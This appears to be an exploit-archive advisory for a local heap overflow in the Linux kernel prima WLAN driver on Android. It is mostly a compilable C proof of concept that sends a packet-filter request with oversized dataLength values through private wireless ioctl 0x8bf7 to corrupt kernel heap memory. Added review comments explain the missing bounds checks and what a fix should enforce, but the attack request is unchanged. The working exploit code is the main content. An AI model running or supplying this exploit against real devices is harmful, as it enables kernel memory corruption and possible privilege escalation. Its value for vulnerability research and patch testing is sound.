Linux Kernel prima WLAN Driver Heap Overflow

2016.01.27
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-119

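/*
 * Coder: Shawn the R0ck, [citypw@gmail.com]
 * Co-worker: Pray3r, [pray3r.z@gmail.com]
 * Compile:
 * # arm-linux-androideabi-gcc wext_poc.c --sysroot=$SYS_ROOT -pie
 * # ./a.out wlan0
 * Boom......shit happens[ as always];-)
 */

/*
 * Review notes (defensive reading of this reproducer):
 *
 * - The request mirrors a packet-filter configuration: up to
 *   HDD_MAX_CMP_PER_PACKET_FILTER entries, each with 8-byte compareData and
 *   dataMask arrays and a caller-supplied one-byte dataLength.
 * - Every entry below declares dataLength = 241, far larger than the 8-byte
 *   arrays it describes. The advisory classifies the bug as a heap overflow
 *   (CWE-119); presumably the driver uses dataLength as a copy length without
 *   comparing it to the destination size. The driver code is not shown on
 *   this page, so confirm against the driver source.
 * - What a fixed handler should enforce before copying anything: reject
 *   numParams > HDD_MAX_CMP_PER_PACKET_FILTER, reject dataLength larger than
 *   sizeof compareData / sizeof dataMask, and check the user buffer length
 *   against the size of the structure it expects.
 * - 0x8bf7 lies in the device-private wireless-extensions ioctl range
 *   (SIOCIWFIRSTPRIV..SIOCIWLASTPRIV). Whether the handler requires a
 *   privilege check is not visible here.
 *
 * Changes in this revision are hygiene only: bounded copy of the interface
 * name, checked socket()/malloc(), and released resources. The request
 * contents are the same as in the original listing.
 */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <linux/wireless.h>
#include <errno.h>

typedef unsigned char v_U8_t;

#define HDD_MAX_CMP_PER_PACKET_FILTER 5

/* One comparison rule of a packet filter; every member is a single byte. */
struct PacketFilterParamsCfg {
    v_U8_t protocolLayer;
    v_U8_t cmpFlag;
    v_U8_t dataOffset;
    v_U8_t dataLength;      /* caller-controlled; nominally <= 8 */
    v_U8_t compareData[8];
    v_U8_t dataMask[8];
};

/* Packet-filter request: a 3-byte header followed by a fixed rule array. */
typedef struct {
    v_U8_t filterAction;
    v_U8_t filterId;
    v_U8_t numParams;
    struct PacketFilterParamsCfg paramsData[HDD_MAX_CMP_PER_PACKET_FILTER];
} tPacketFilterCfg, *tpPacketFilterCfg;

/*
 * Build one packet-filter request and submit it to the interface named in
 * argv[1] through a private wireless-extensions ioctl.
 *
 * Returns -1 on bad usage or local setup failure, 0 otherwise (the ioctl
 * result is only reported on stderr/stdout, as in the original).
 */
int main(int argc, const char *argv[])
{
    if (argc != 2) {
        fprintf(stderr, "Bad usage\n");
        fprintf(stderr, "Usage: %s ifname\n", argv[0]);
        return -1;
    }

    struct iwreq req;

    /*
     * The original used strcpy() here, which overruns the fixed-size
     * interface-name field when argv[1] is too long. Copy with a bound and
     * refuse names that do not fit.
     */
    int written = snprintf(req.ifr_ifrn.ifrn_name,
                           sizeof req.ifr_ifrn.ifrn_name, "%s", argv[1]);
    if (written < 0 || (size_t)written >= sizeof req.ifr_ifrn.ifrn_name) {
        fprintf(stderr, "Interface name too long: %s\n", argv[1]);
        return -1;
    }

    int fd = socket(AF_INET, SOCK_DGRAM, 0);
    if (fd == -1) {
        fprintf(stderr, "socket() failed: %s\n", strerror(errno));
        return -1;
    }

    tPacketFilterCfg p_req;

    /* Same size expression as the original: 3 header bytes + 5 rules. */
    const size_t payload_len = sizeof(v_U8_t) * 3 +
                               sizeof(struct PacketFilterParamsCfg) * 5;

    /* crafting a data structure to triggering the code path */
    req.u.data.pointer = malloc(payload_len);
    if (req.u.data.pointer == NULL) {
        fprintf(stderr, "malloc() failed\n");
        close(fd);
        return -1;
    }

    p_req.filterAction = 1;
    p_req.filterId = 0;
    p_req.numParams = 3;

    for (int i = 0; i < HDD_MAX_CMP_PER_PACKET_FILTER; i++) {
        /* Declared length exceeds the 8-byte arrays it describes. */
        p_req.paramsData[i].dataLength = 241;
        /*
         * The original issued one 16-byte memset starting at compareData,
         * which spills into the adjacent dataMask member. Fill the two
         * arrays separately; the resulting bytes are identical.
         */
        memset(p_req.paramsData[i].compareData, 0x41,
               sizeof p_req.paramsData[i].compareData);
        memset(p_req.paramsData[i].dataMask, 0x41,
               sizeof p_req.paramsData[i].dataMask);
    }

    memcpy(req.u.data.pointer, &p_req, payload_len);

    if (ioctl(fd, 0x8bf7, &req) == -1) {
        fprintf(stderr, "Failed ioct() get on interface %s: %s\n",
                argv[1], strerror(errno));
    } else {
        printf("You shouldn't see this msg...\n");
    }

    free(req.u.data.pointer);
    close(fd);
    return 0;
}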

